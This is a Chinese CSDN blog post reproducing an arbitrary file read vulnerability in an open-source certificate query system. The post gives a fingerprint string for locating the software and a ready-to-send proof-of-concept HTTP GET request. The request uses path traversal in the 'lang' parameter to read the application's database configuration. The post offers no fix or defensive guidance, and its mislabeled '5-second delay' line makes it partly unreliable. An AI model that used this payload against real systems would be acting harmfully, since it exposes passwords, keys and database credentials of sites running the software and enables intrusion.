漏洞复现-K26-1开源-证书查询系统-任意文件读取

于 2024-08-16 16:43:50 发布
阅读量117 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141263735
版权

1 产品简介

某开源的证书查询系统不少平台在使用

2 漏洞概述

攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。

3 复现环境

"/index/js/jquery.uls.data.js'"

POC

延时5秒

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

 

外道・輪廻天生
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于Docker在线方式搭建K8s集群 - 一主两从 - 永久证书
m0_50978391的博客
04-12 1052
基于Docker在线方式搭建K8s集群 - 一主两从
tomato-K26USB-13.05.0041-MIPSR2-8M
06-01
tomato-K26USB-13.05.0041-MIPSR2-8M
【KV260】解决xilinx-k26-starterkit-v2021.1-final.bsp在petalinux2021.1下配置及建立工程导致的问题
qq_43172512的博客
01-29 773
【KV260】解决xilinx-k26-starterkit-v2021.1-final.bsp在petalinux2021.1下配置及建立工程导致的问题
ipa-apk.cn dbl.html,javascript - retrieving pictures stored as blob in the database and display it i...
weixin_30413679的博客
06-15 1204
i have a medium blob data type on my database, it is storing pictures with gif,jpg,png,bmp types.i am retrieving the blob using jsf.i have read this question -> Using Javascript to Display Blobbut ...
《安富莱嵌入式周报》第209期:2021.04.19--2021.04.25
Simon223的博客
04-27 605
1、Xilinx推出K26视觉AI核心板,可以直接用于产品设计,加速产品上市https://www.xilinx.com/products/som/kria.html Xilinx新的Kria K26核心板,专为加速视觉AI应用而打造,可直接用于产品。Kria核心板在设计时就考虑了软件工程师,无需FPGA编程经验即可提供熟悉的设计环境(使用Xilinx在2019年推出的工具链Vitis,支持C/Python编程,Vitis AI和Vitis加速库允许使用纯软件定义的流程进行端到端应用程序加速-无需硬件专..
MICMIC-IV 个人查询策略(+官方查询语句注释)
skyskytotop的博客
01-20 3867
MICMIC-IV 查询策略 适合的人群:了解基本的SQL语言 目的:通过学习mimic数据库的数据格式也能够建立并使用自己的数据库 概念: 静态数据, 静态数据表格(包含静态数据的表格), 哪些表格; 动态数据, 动态数据表格,哪些表格, 是否有表格即包含静态数据又包含动态数据,没有的. 整体策略: 首先分为静态数据和动态数据 静态数据的提取: 静态数据, 不受时间因素的影响,多是分类变量,比如,年龄,性别等,按照文献的策略提取… … 并存入到patient表格; 一般查询,加减函数(比如出院时间减
ORA-00257错误解决方法
热门推荐
Ruishine的博客
03-28 2万+
ORA-00257:archiver error. Connect internal only. unitl freed.
云原生(五)、Docker-Swarm集群
baidu_39340547的博客
03-20 1432
在 Docker 中,Swarm 是一种容器编排工具,它允许用户在一个集群中管理多个 Docker 容器。Docker Swarm 允许您将多个 Docker 守护进程组织成一个虚拟的 Docker 引擎,这个引擎可以用来部署您的容器化应用程序。通过 Docker Swarm,您可以轻松地管理、扩展和调度容器,以便适应不同规模的工作负载。
08. Kubernetes基础篇-服务发布
weixin_40901913的博客
07-20 937
标签是键值对的元数据,可以附加到 Kubernetes 资源上,如 Pod、Deployment、Service 等。它们用于对资源进行分类和标记,以便于识别和检索。Labels可以应用与kubernetes中任何资源上。标签选择器是基于标签的查询条件,用于在 Kubernetes API 中过滤资源。标签选择器可以基于单个标签或多个标签进行匹配。单标签选择器、多标签选择器、基于表达式的选择器、基于范围的选择器、复合选择器。Service。
Prompt-Guided Injection of Conformation to Pre-trained Protein Model
qianyinei的博客
12-11 551
Prompt-Guided Injection of Conformation to Pre-trained Protein Model的阅读
tomato-K26USB-13.09.0042-MIPSR2-8M
06-01
tomato-K26USB-13.09.0042-MIPSR2-8M
tomato-K26-13.05.0041-MIPSR2-4M
06-01
tomato-K26-13.05.0041-MIPSR2-4M
tomato-K26USB-1.28.0542-MIPSR2-[8M].zip
08-18
tomato-K26USB-1.28.0542-MIPSR2,比较不好找的一款固件了
tomato-K26-1.28.0542-MIPSR2-(4M).zip
08-18
【标题】"tomato-K26-1.28.0542-MIPSR2-(4M).zip" 提供的信息是关于一种特定的固件版本,该固件基于Tomato操作系统,适用于MIPS R2架构,并且专为具有4MB内存的设备设计。"K26"通常代表内核版本为2.6,这是Linux...
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 133
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
等保测评中的安全需求分析:构建精准的信息安全防护体系
最新发布
w13359990065的博客
08-15 509
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 568
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
[Linux]车联网安全-大佬都在用的渗透测试系统
Liyu_6618的博客
08-12 289
天刃是一个基于Ubuntu 18.04的车联网渗透测试发行版系统,主要用于针对车联网设备进行安全评估。系统内置上百个车联网安全测试专用工具,旨在解决车联网安全从业人员测试工具杂乱、测试环境配置复杂、无工具可用等一系列问题。本系统提供ISO镜像安装与OVA镜像导入方式安装,推荐使用OVA导入虚拟机操作更为简单方便。覆盖逆向、CAN、车载以太网、WiFi、蓝牙、云平台等安全测试。导入或安装成功后开机使用iov/root进行登录,登录成功后会显示用户体验计划,可选择同意或拒绝,确认完成后即可开始使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值